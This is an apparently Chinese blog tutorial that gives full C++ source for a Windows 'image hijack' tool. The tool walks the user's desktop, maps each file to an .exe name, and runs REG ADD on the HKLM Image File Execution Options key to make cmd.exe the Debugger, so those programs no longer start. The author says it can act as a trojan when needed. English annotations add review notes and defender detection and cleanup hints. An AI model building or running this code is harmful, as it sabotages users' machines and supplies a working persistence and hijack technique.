#####实现映像劫持所必需的头文件有:
#include "shlobj.h"
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
#####在这里,我的程序并未使用任何隐藏技术和多线程技术,准确地说不能算是木马,但是必要之时却也可以起到相应的作用。为了节约时间,我仅仅对当前用户桌面下的所有文件做了映像劫持。
######获取桌面路径:
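/// Returns the current user's desktop folder path, or "" if any Shell call fails.
///
/// Uses the Shell API (SHGetMalloc / SHGetSpecialFolderLocation) and converts the
/// resulting item-id list to a file-system path. The buffer is MAX_PATH sized and
/// zero-initialised: SHGetPathFromIDListA requires a MAX_PATH buffer, and the
/// previous 200-byte uninitialised array returned garbage whenever a call failed.
string getDesktopPath()
{
    LPITEMIDLIST pidl = NULL;
    LPMALLOC pShellMalloc = NULL;
    char szDir[MAX_PATH] = { 0 };
    if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
    {
        if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl)))
        {
            // SHGetPathFromIDListA returns TRUE on success; on failure report "no path"
            // instead of whatever the buffer happens to hold.
            if (!SHGetPathFromIDListA(pidl, szDir))
            {
                szDir[0] = '\0';
            }
            pShellMalloc->Free(pidl);
        }
        pShellMalloc->Release();
    }
    return string(szDir);
}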
######遍历桌面下的所有文件并把它们添加到我的list中,用它来模拟链表的功能:
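/// Recursively appends the bare name (no directory part) of every file below
/// Path to the list FileName, which is declared elsewhere in the file (it is a
/// Hacker member in the complete listing).
/// @param Path directory to walk, without a trailing backslash
/// @return 0 on success, -1 if Path cannot be opened for enumeration
int GetAllgpxFilepathFromfolder(string Path)
{
    // Build the search pattern with std::string; the original strcpy/strcat
    // into a fixed MAX_PATH buffer overflowed for sufficiently long paths.
    const string pattern = Path + "\\*.*";
    WIN32_FIND_DATA FindFileData;
    HANDLE hFind = FindFirstFile(pattern.c_str(), &FindFileData);
    if (INVALID_HANDLE_VALUE == hFind) return -1;
    do
    {
        const string name = FindFileData.cFileName;
        if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
        {
            if (name != "." && name != "..")
            {
                // Subdirectory: recurse with the full path.
                GetAllgpxFilepathFromfolder(Path + "\\" + name);
            }
        }
        else
        {
            FileName.push_back(name);
        }
    } while (FindNextFile(hFind, &FindFileData));
    FindClose(hFind);
    return 0;
}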
######这个函数的作用是把字符串中所有的子串A替换成B,不过我觉得它写得还是有点问题。
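/// Replaces every occurrence of A in S with B, in place.
///
/// The scan resumes just past the inserted text: the original `found + 1`
/// re-scanned the replacement (so B containing A, e.g. "a" -> "aa", looped
/// forever) and skipped a character when B was shorter than A (so "abab" with
/// "ab" -> "" left "ab" behind). An empty A matches at every position and is
/// rejected outright.
/// @param S string edited in place
/// @param A pattern to replace; no-op when empty
/// @param B replacement text; may be empty
void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
    if (A.empty()) {
        return;
    }
    std::size_t found = S.find(A);
    while (std::string::npos != found) {
        S.replace(found, A.length(), B);
        found = S.find(A, found + B.length());
    }
}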
#####基本的核心代码就是以上这些,现在我们来看一下主函数的调用:(构造函数已省略,完整代码在后面。)
// Body of main(): collect desktop file names, normalise each to an ".exe"
// name, then register cmd.exe as the IFEO "Debugger" for every such name.
// NOTE(review): `one` is never deleted; `Hacker one;` on the stack would avoid the leak.
Hacker* one = new Hacker();
string arr;
// Pass 1: ".lnk" becomes ".exe" and anything after the first ".exe" is dropped.
// Names containing neither are left unchanged and still get an entry below.
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
replaceA_to_B(*itor, ".lnk", ".exe");
// NOTE(review): find() returns std::size_t (npos on a miss); storing it in an
// int and comparing with -1 relies on the implicit conversion.
int pos = 0;
pos =(*itor).find(".exe");
if (-1 != pos)
{
*itor = (*itor).substr(0, pos+4); // 4 == strlen(".exe")
}
}
// Pass 2: for each name spawn REG.EXE to create
//   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<name>
// with Debugger = "cmd.exe". Windows then launches the Debugger program (with the
// original command line appended) instead of the named image -- the "image hijack"
// the article describes; writing under HKLM presumably needs an elevated process -- verify.
// Defender notes: this is IFEO Debugger persistence/hijack (MITRE ATT&CK T1546.012).
// Writes to the IFEO key and REG.EXE spawned from an unsigned console binary are
// high-signal events for registry auditing / EDR rules; cleanup is REG DELETE of
// the same keys.
// NOTE(review): the file name is spliced into the shell command unescaped, so a
// name containing a double quote or a cmd metacharacter breaks the command.
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + " /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
system(arr.c_str());
}
system("pause"); // keep the console window open until a key is pressed
return 0;
#####唯一要注意的就是Win7下注册表项似乎要加双引号才可以访问,Win10似乎没有这个要求。在C/C++中要注意转义字符,所以特别提醒这个双引号转义的问题。
附全部源码:
#include "shlobj.h"
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
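/// Collects the names of all files under the current user's desktop.
///
/// The constructor resolves the desktop folder through the Shell API and then
/// walks it recursively; every regular file's bare name (no directory part) is
/// appended to FileName. The names come straight from the file system and are
/// untrusted input for whatever consumes the list.
class Hacker {
public:
    /// Performs the Shell and file-system I/O; does not throw. If the desktop
    /// path cannot be resolved, FileName is left empty.
    Hacker()
    {
        Path = this->getDesktopPath();
        // Guard: with an empty Path the search pattern would become "\*.*",
        // which no longer refers to the desktop folder.
        if (!Path.empty())
        {
            GetAllgpxFilepathFromfolder(Path);
        }
    }
private:
    string Path;
public:
    /// Bare file names found below the desktop, in enumeration order.
    list<string> FileName;
private:
    /// Returns the desktop folder path, or "" if any Shell call fails.
    string getDesktopPath()
    {
        LPITEMIDLIST pidl = NULL;
        LPMALLOC pShellMalloc = NULL;
        // SHGetPathFromIDListA requires a MAX_PATH buffer; the previous
        // 200-byte uninitialised array was too small and returned garbage
        // whenever one of the calls below failed.
        char szDir[MAX_PATH] = { 0 };
        if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
        {
            if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl)))
            {
                // Returns TRUE on success; on failure report "no path".
                if (!SHGetPathFromIDListA(pidl, szDir))
                {
                    szDir[0] = '\0';
                }
                pShellMalloc->Free(pidl);
            }
            pShellMalloc->Release();
        }
        return string(szDir);
    }
private:
    /// Recursively appends the bare name of every file below Path to FileName.
    /// @param Path directory to walk, without a trailing backslash
    /// @return 0 on success, -1 if Path cannot be opened for enumeration
    int GetAllgpxFilepathFromfolder(string Path)
    {
        // std::string concatenation replaces strcpy/strcat into a fixed
        // MAX_PATH buffer, which overflowed for sufficiently long paths.
        const string pattern = Path + "\\*.*";
        WIN32_FIND_DATA FindFileData;
        HANDLE hFind = FindFirstFile(pattern.c_str(), &FindFileData);
        if (INVALID_HANDLE_VALUE == hFind) return -1;
        do
        {
            const string name = FindFileData.cFileName;
            if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                if (name != "." && name != "..")
                {
                    // Subdirectory: recurse with the full path.
                    GetAllgpxFilepathFromfolder(Path + "\\" + name);
                }
            }
            else
            {
                FileName.push_back(name);
            }
        } while (FindNextFile(hFind, &FindFileData));
        FindClose(hFind);
        return 0;
    }
};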
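/// Replaces every occurrence of A in S with B, in place.
///
/// The scan resumes just past the inserted text: the original `found + 1`
/// re-scanned the replacement (so B containing A, e.g. "a" -> "aa", looped
/// forever) and skipped a character when B was shorter than A (so "abab" with
/// "ab" -> "" left "ab" behind). An empty A matches at every position and is
/// rejected outright.
/// @param S string edited in place
/// @param A pattern to replace; no-op when empty
/// @param B replacement text; may be empty
void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
    if (A.empty()) {
        return;
    }
    std::size_t found = S.find(A);
    while (std::string::npos != found) {
        S.replace(found, A.length(), B);
        found = S.find(A, found + B.length());
    }
}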
/// Entry point: collects desktop file names, normalises each to an ".exe"
/// name, then registers cmd.exe as the IFEO "Debugger" for every such name.
int main()
{
// NOTE(review): `one` is never deleted; `Hacker one;` on the stack would avoid the leak.
Hacker* one = new Hacker();
string arr;
// Pass 1: ".lnk" becomes ".exe" and anything after the first ".exe" is dropped.
// Names containing neither are left unchanged and still get an entry below.
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
replaceA_to_B(*itor, ".lnk", ".exe");
// NOTE(review): find() returns std::size_t (npos on a miss); storing it in an
// int and comparing with -1 relies on the implicit conversion.
int pos = 0;
pos =(*itor).find(".exe");
if (-1 != pos)
{
*itor = (*itor).substr(0, pos+4); // 4 == strlen(".exe")
}
}
// Pass 2: for each name spawn REG.EXE to create
//   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<name>
// with Debugger = "cmd.exe". Windows then launches the Debugger program (with the
// original command line appended) instead of the named image -- the "image hijack"
// the article describes; writing under HKLM presumably needs an elevated process -- verify.
// Defender notes: this is IFEO Debugger persistence/hijack (MITRE ATT&CK T1546.012).
// Writes to the IFEO key and REG.EXE spawned from an unsigned console binary are
// high-signal events for registry auditing / EDR rules; cleanup is REG DELETE of
// the same keys.
// NOTE(review): the file name is spliced into the shell command unescaped, so a
// name containing a double quote or a cmd metacharacter breaks the command.
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + " /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
system(arr.c_str());
}
system("pause"); // keep the console window open until a key is pressed
return 0;
}